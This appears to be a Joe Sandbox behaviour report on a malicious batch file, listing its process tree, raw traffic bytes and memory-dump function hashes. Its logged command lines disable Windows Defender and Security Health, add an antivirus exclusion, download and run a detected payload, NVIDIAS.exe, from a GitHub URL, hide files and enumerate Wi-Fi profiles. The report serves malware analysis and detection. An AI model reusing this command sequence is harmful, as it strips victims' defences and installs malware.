2024-12-16 16:30:17 UTC	1512	IN	Data Raw: e4 43 7b ed f1 54 64 f6 95 4d 6f dc da 53 d0 9e 70 e6 66 97 e8 4d 07 97 c7 05 a3 c0 49 9d 6e 76 ff bf da fc bb 30 2a e7 dc 59 7b df db 51 66 75 6d ff e1 37 76 9e 25 4e 7e 52 20 4d 03 5f c3 a0 e6 83 c3 1e 40 6b 75 57 aa 1a 5a 36 eb 53 f0 f1 46 17 4f 2f 93 73 c1 d7 6a 8f 0a 9c f3 30 8a 20 34 15 1b a8 b8 6f 74 e7 66 12 d8 17 50 95 48 ca 3c 8d cf ec ea cb 71 5b e5 e4 9c f4 ec 70 75 62 82 43 c8 b4 29 a2 cb fe ca 70 5c 5b 9a cd 36 a7 98 db 8b 73 f0 d0 0e df be e6 c4 f9 ad f4 f6 28 82 21 f9 3d e5 f3 95 8f 3e 94 d9 5c e5 d6 d9 48 39 23 a1 0a f6 d3 70 38 6b 5a f8 e3 43 61 44 23 e2 c3 e5 17 f5 44 a7 04 eb 48 eb b2 2d 44 dc 5a bf ba 96 a9 c4 1d 07 a3 99 5c 6a 4d 64 3b ad 02 1c a6 ab ef e5 89 ef 02 1f 75 ca ce 8a 0a be 99 0e ab ce 66 c9 3c 3a 24 3b 1a 81 01 c7 59 d6 Data Ascii: C{TdMoSpfMInv0*Y{Qfum7v%N~R M_@kuWZ6SFO/sj0 4otfPH<q[pubC)p\[6s(!=>\H9#p8kZCaD#DH-DZ\jMd;uf<:$;Y
2024-12-16 16:30:17 UTC	16384	IN	Data Raw: 0a d1 be 88 8a f3 10 3e 04 08 a9 1d 16 b4 06 cd ec 2e c4 db 58 75 d6 01 e9 36 a3 6e 19 20 46 03 c9 15 39 29 85 e4 1a 03 77 79 ce ff 4d 8d 00 9f b7 a8 1c ec b9 ec 68 74 a8 9e a3 be ef 8e f4 4c 3c 38 83 61 d5 0e 92 64 6d 60 7c b9 cd 0c 58 d4 77 9c 27 1c 66 96 1b 52 c0 31 6f 5b 00 9b 96 c0 6a 89 a8 95 35 e9 26 47 20 67 3f 49 20 2c 19 ad f4 25 9d e1 5c 7d ed fa 63 95 87 b9 fa d4 04 15 cd 70 e9 2b 93 ce e9 a7 b4 9e 1b 6f 76 a0 47 9a 1c 5e 07 e8 90 1e ae 70 3a fc f9 e6 0e 13 00 6c 5f a6 8d fa e4 80 b2 02 b7 7e cd 46 d8 64 fb e8 dc 99 16 78 b0 01 a9 e7 8d e7 1c 99 2b 77 ec a4 e7 6a f7 bc d0 6e 4e 51 af 6a fb ae 1f f7 3c 22 a9 29 45 ac 29 e1 de d2 f3 85 a2 0f de a8 59 e0 6e 53 e9 cf 52 5a f8 ef f6 fb 42 93 7f 49 75 44 0d 60 ff ab e7 0c b8 ea 3c 36 ca 3c 66 4a c6 Data Ascii: >.Xu6n F9)wyMhtL<8adm`\|Xw'fR1o[j5&G g?I ,%\}cp+ovG^p:l_~Fdx+wjnNQj<")E)YnSRZBIuD`<6<fJ
2024-12-16 16:30:17 UTC	1512	IN	Data Raw: 1a b9 5e 0d 9b d1 8f f9 0c 8b ff 56 85 cd 58 e9 5a 6d d9 f5 2e 6e b1 23 28 de 5a a2 b1 6a 7b 2e 4a 71 36 38 65 fd f3 9f d9 be d1 c4 f1 17 7d 90 8f 6d c9 9d 63 0f 57 df 9b c2 5f 43 a5 84 03 68 af 4f f1 51 e4 91 75 4c 3f 07 04 67 54 34 31 4d 9e 11 60 04 b3 6e 97 fd a4 01 c2 c5 83 a5 bf d0 58 95 d6 0e 5f 9e 38 c2 91 06 58 7b 41 d7 61 6e d6 79 11 08 6b a4 a2 cd 0c 6b 65 c0 23 90 18 26 be 56 14 37 6b b0 a9 2b d4 b2 27 5d 1e 92 c2 82 52 bd e2 a2 b4 0d ad ba 94 22 85 45 49 3c 4b 1e 42 c9 71 85 29 cf a4 b0 a9 a2 72 82 d5 dc e0 ee bd 80 5d 89 a8 c8 16 6e 9f 3a 7f eb a4 c3 6d 00 8f ed f3 58 43 78 69 3b 66 82 ce c3 65 e4 4e a8 6a f6 73 93 c7 74 06 bb e9 20 ad 51 70 69 76 3f db 31 05 6b 0b 47 d2 59 81 bd 24 28 11 cd 17 77 56 c3 ff 74 9c 15 9b dc 87 73 33 b1 05 ec cc Data Ascii: ^VXZm.n#(Zj{.Jq68e}mcW_ChOQuL?gT41M`nX_8X{Aanykke#&V7k+']R"EI<KBq)r]n:mXCxi;feNjst Qpiv?1kGY$(wVts3

Target ID:	0
Start time:	11:29:59
Start date:	16/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" "
Imagebase:	0x7ff6637b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:29:59
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff72cee0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\cacls.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
Imagebase:	0x7ff77e590000
File size:	34'304 bytes
MD5 hash:	A353590E06C976809F14906746109758
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -window hidden -command ""
Imagebase:	0x7ff71c820000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1
Imagebase:	0x7ff68c190000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1
Imagebase:	0x7ff68c190000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1
Imagebase:	0x7ff68c190000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1
Imagebase:	0x7ff68abd0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth"
Imagebase:	0x7ff68c190000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f "C:\Windows\System32\SecurityHealthService.exe"
Imagebase:	0x7ff69a820000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c
Imagebase:	0x7ff7eea40000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f "C:\Windows\System32\SecurityHealthSystray.exe"
Imagebase:	0x7ff69a820000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:30:00
Start date:	16/12/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c
Imagebase:	0x7ff7eea40000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:30:01
Start date:	16/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /IM SecurityHealthSystray.exe /F
Imagebase:	0x7ff681080000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:30:01
Start date:	16/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ
Imagebase:	0x7ff71c820000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:30:02
Start date:	16/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff724ec0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	11:30:02
Start date:	16/12/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout.exe /t 10
Imagebase:	0x7ff729a20000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:30:12
Start date:	16/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h "QQQ" /s /d
Imagebase:	0x7ff725270000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:30:14
Start date:	16/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"
Imagebase:	0x7ff71c820000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:30:17
Start date:	16/12/2024
Path:	C:\ProgramData\QQQ\NVIDIAS.exe
Wow64 process (32bit):	true
Commandline:	NVIDIAS.exe
Imagebase:	0xf70000
File size:	827'904 bytes
MD5 hash:	2FE8C93D75210E538AEC9062BA29C645
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:30:17
Start date:	16/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d
Imagebase:	0x7ff725270000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:30:19
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c tasklist
Imagebase:	0xfa0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:30:19
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff72cee0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:30:19
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc90000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:30:19
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Imagebase:	0xfa0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:30:19
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff72cee0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:30:19
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x580000
File size:	12'800 bytes
MD5 hash:	41146159AA3D41A92B53ED311EE15693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:30:19
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profiles
Imagebase:	0x1490000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:30:19
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x110000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:30:34
Start date:	16/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff68abd0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	11:30:34
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat
Imagebase:	0xfa0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:30:34
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff72cee0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:30:34
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x580000
File size:	12'800 bytes
MD5 hash:	41146159AA3D41A92B53ED311EE15693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:30:34
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	TaskKill /F /IM 716
Imagebase:	0xf70000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	11:30:34
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716
Imagebase:	0x570000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:30:34
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	Timeout /T 2 /Nobreak
Imagebase:	0xa70000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	11:30:35
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 3320
Imagebase:	0x570000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	42.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 033A1089 Relevance: 14.7, Strings: 6, Instructions: 7221COMMON

Download Yara Rule

Strings

.s2-, xrefs: 033A30CB
;7X, xrefs: 033A7FD3
S, xrefs: 033A39A1, 033A39A6
5q-[, xrefs: 033A59B0
,U, xrefs: 033A6E9D
1P#8, xrefs: 033A75BF

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID: ;7X$,U$.s2-$1P#8$5q-[$S
API String ID: 0-2442268200
Opcode ID: 6035e899f176862009daba6fe86d4aad989c2db8892d379ecb1d209da8f17aef
Instruction ID: 6f30b4245e87fd54a065d9ce9c305603a36d1b172366284538d2ccfec2d51c94
Opcode Fuzzy Hash: 6035e899f176862009daba6fe86d4aad989c2db8892d379ecb1d209da8f17aef
Instruction Fuzzy Hash: 34E32075E106299FCB54DF69C880A9DB7B6EF89210F1181EAD809F7350DB71AE81CF90

Function 033A1098 Relevance: 14.7, Strings: 6, Instructions: 7197COMMON

Download Yara Rule

Strings

.s2-, xrefs: 033A30CB
;7X, xrefs: 033A7FD3
S, xrefs: 033A39A1, 033A39A6
5q-[, xrefs: 033A59B0
,U, xrefs: 033A6E9D
1P#8, xrefs: 033A75BF

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID: ;7X$,U$.s2-$1P#8$5q-[$S
API String ID: 0-2442268200
Opcode ID: 45220ebd394fcef736e6f295cd5c9e35a30ac34b0657478557c17377633a41dc
Instruction ID: 5ef0ee1c39e030c33630bdcf25aa5b64dc4cf4e6bffe8de105451a50a3ea1ad4
Opcode Fuzzy Hash: 45220ebd394fcef736e6f295cd5c9e35a30ac34b0657478557c17377633a41dc
Instruction Fuzzy Hash: 70E32075E106299FCB54DF69C880A9DB7B6EF89210F1181EAD809F7350DB71AE81CF90

Function 05D4AC20 Relevance: 12.1, Strings: 6, Instructions: 4554COMMON

Download Yara Rule

Strings

=7, xrefs: 05D4C306
2l%\, xrefs: 05D4EC75
!5g, xrefs: 05D4E8B9
0@&G, xrefs: 05D4D089
J:), xrefs: 05D4CF33
7r>, xrefs: 05D4D730

Memory Dump Source

Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd

Similarity

API ID:
String ID: !5g$0@&G$2l%\$7r>$=7$J:)
API String ID: 0-1553758874
Opcode ID: fd510f35191aa08b539817fdba17fbe96bec7fd99261500762f5b744a9aeb03f
Instruction ID: ee384f18cddc26e3346689500417b580854c11acc8cd52046ffb7f828cc24746
Opcode Fuzzy Hash: fd510f35191aa08b539817fdba17fbe96bec7fd99261500762f5b744a9aeb03f
Instruction Fuzzy Hash: BA936275A002199FCB54DFA8C890A9DF7B6FF88310F1585AAD409EB351DB35AD86CF80

Function 05D46140 Relevance: 10.0, Strings: 5, Instructions: 3727COMMON

Download Yara Rule

Strings

#D<, xrefs: 05D48A64
$, xrefs: 05D4830C
E7t, xrefs: 05D49153
U9!, xrefs: 05D48A6F
72., xrefs: 05D467BD

Memory Dump Source

Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd

Similarity

API ID:
String ID: U9!$#D<$$$72.$E7t
API String ID: 0-1360831551
Opcode ID: 7abf599a52734d5e0dba0305dbcec112d070c0307f4bc41fe0d4e07eef078d69
Instruction ID: bf70f433b9053e3830b26463d8d4cb6fe3b25533b9c0322ef890690758834215
Opcode Fuzzy Hash: 7abf599a52734d5e0dba0305dbcec112d070c0307f4bc41fe0d4e07eef078d69
Instruction Fuzzy Hash: B8639136B002259FC714DF69D8909AAF7F6FB88350B15856AD80AEB351DB31EC46CF80

Function 0353E061 Relevance: 7.4, Strings: 5, Instructions: 1162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 0353E794
#, xrefs: 0353E7E0
", xrefs: 0353E7BF
, xrefs: 0353E773
$, xrefs: 0353E801

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID:
String ID: $!$"$#$$
API String ID: 0-2407675498
Opcode ID: 0c47956b4fe9b1a829488329fc7251b6cb7f4e7d844a7268821e396099d29976
Instruction ID: ab68e78ed81b4983cdcb59ed84413b51fe8ea431abcff0d149fd5ccfad1a92b7
Opcode Fuzzy Hash: 0c47956b4fe9b1a829488329fc7251b6cb7f4e7d844a7268821e396099d29976
Instruction Fuzzy Hash: EA82E376B002254BD748EBA9D8607AEA2FBABC4700F05456DC44AEB391CF75DC178BE1

Function 033AD800 Relevance: 5.8, Strings: 3, Instructions: 2009COMMON

Download Yara Rule

Strings

+];, xrefs: 033AD886
2Ta, xrefs: 033AF2A9
%2&b, xrefs: 033AE8AE

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID: %2&b$+];$2Ta
API String ID: 0-3369895701
Opcode ID: 569199f0295a485077f70807088f10368fd8aa96face324d7a7c241f7c77232a
Instruction ID: aab8cee708d6b484ee244cbf925832235da90c796a063d35e5aa0f90cca57fb4
Opcode Fuzzy Hash: 569199f0295a485077f70807088f10368fd8aa96face324d7a7c241f7c77232a
Instruction Fuzzy Hash: 65037775A016198FCB24DF68CCD4A9DBBB2FF88210F1581A9E909AB361DB35DD85CF40

Function 08303578 Relevance: 5.4, Strings: 3, Instructions: 1674COMMON

Download Yara Rule

Strings

d, xrefs: 08303A96
r6), xrefs: 08304613
>*B, xrefs: 08304163

Memory Dump Source

Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID: >*B$r6)$d
API String ID: 0-3739268421
Opcode ID: fdf158b7704d19d33cf869daf9186dd9e7c54e87730758e6fdbc446790dced64
Instruction ID: ac211f02f2cdce5ee8300df2c26c5a4f213cf3e14172e7a1a3a29e391cc38ad7
Opcode Fuzzy Hash: fdf158b7704d19d33cf869daf9186dd9e7c54e87730758e6fdbc446790dced64
Instruction Fuzzy Hash: BAE26276E102288FDB64CF58C994A99F7F2AB88314F1582EAD809EB351D731DD85CF80

Function 07312BA3 Relevance: 3.0, Strings: 2, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

;L(|, xrefs: 07312E42
#5}, xrefs: 07313029

Memory Dump Source

Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd

Similarity

API ID:
String ID: #5}$;L(|
API String ID: 0-3985745917
Opcode ID: a366588a9fc7e6a66474753e781b50db567356f7bc0f6028b846607e19d46e77
Instruction ID: e59f2a58e5ddf796bbc6378b58d17d6f03ac39f241432c4717796b86c7508dff
Opcode Fuzzy Hash: a366588a9fc7e6a66474753e781b50db567356f7bc0f6028b846607e19d46e77
Instruction Fuzzy Hash: AA12A276F102258FD718CEADC89059AF7F6BB8830071A856AD809EB355DB74EC46CBC0

Function 08300040 Relevance: 3.0, Strings: 1, Instructions: 1727COMMON

Download Yara Rule

Strings

H97, xrefs: 08301E82

Memory Dump Source

